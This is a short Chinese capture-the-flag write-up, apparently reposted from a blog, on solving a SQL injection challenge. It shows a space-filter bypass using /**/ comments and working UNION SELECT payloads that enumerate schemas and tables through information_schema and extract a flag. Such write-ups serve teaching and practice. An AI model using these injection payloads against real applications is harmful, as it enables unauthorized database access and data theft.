首页 > 数据库技术 > 详细

简单的sql注入2

时间:2019-07-19 20:59:26      阅读:114      评论:0      收藏:0      [点我收藏+]

尝试

1

1’

1”

发现1’还是会报错,所以注入口还是1’

再试试1‘ and ‘1‘=‘1发现报出SQLi detected!

取消空格试试1‘and‘1‘=‘1

技术分享图片

似乎可以进入,应该就是过滤了空格

我们仍使用/**/的方法

1‘/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/‘1‘=‘1

查询数据库表信息

技术分享图片

查询数据表web1下的列信息

1‘/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=‘web1

技术分享图片

然后查询flag

1‘/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/‘1‘=‘1

技术分享图片

 

 

简单的sql注入2

原文:https://www.cnblogs.com/wosun/p/11215652.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!